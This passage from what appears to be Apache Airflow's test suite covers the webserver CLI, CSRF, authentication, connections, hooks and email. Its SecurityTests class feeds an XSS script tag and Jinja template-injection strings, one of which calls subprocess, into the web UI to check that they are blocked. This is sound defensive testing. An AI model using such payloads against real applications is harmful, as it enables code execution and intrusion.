@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import subprocess
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
    # Patch get_num_workers_running to return 0 so the gunicorn master looks
    # dead and the webserver monitor times out
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
        except Exception:
            # an exception is expected here since the dag doesn't exist
            pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_bash2 = self.dagbag.dags['test_example_bash_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_bash2 = self.dag_bash2.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
        # The HTML should contain data for the last run: a link to the specific
        # run and the text of its date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_bash2.dag_id,
"execution_date": self.dagrun_bash2.execution_date,
        }).replace("&", "&amp;")
self.assertIn(url, resp_html)
self.assertIn(self.dagrun_bash2.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=test_example_bash_operator')
self.assertIn("test_example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=run_this_last&"
"dag_id=test_example_bash_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=run_this_last&'
'dag_id=test_example_bash_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=runme_1&"
"dag_id=test_example_bash_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=test_example_bash_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("run_this_last", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:  # the "ldap" section may already exist
            pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:  # the "ldap" section may already exist
            pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
        the fake snakebite client's ``ls``
        :param path: a list of paths to test
        :param include_toplevel: whether to include the top-level directory info
        :return: a list of file-status dicts for the matching paths
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
                'modification_time': 1481122343862,
                'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
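        # Connections can also be supplied through AIRFLOW_CONN_<CONN_ID>
        # environment variables holding a connection URI; these take
        # precedence over entries stored in the metadata database.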
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:[email protected]:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:[email protected]:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:[email protected]:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:[email protected]:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
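    # snakebite (and hence HDFSHook) is an optional dependency; the HDFS hook
    # tests below are skipped when it is not installed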
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
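# Module-level mock used as a pluggable email backend: test_custom_backend points
# the [email] EMAIL_BACKEND setting at 'tests.core.send_email_test' and asserts
# that this mock is invoked instead of the SMTP backend.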
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_subtype='mixed'
)
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
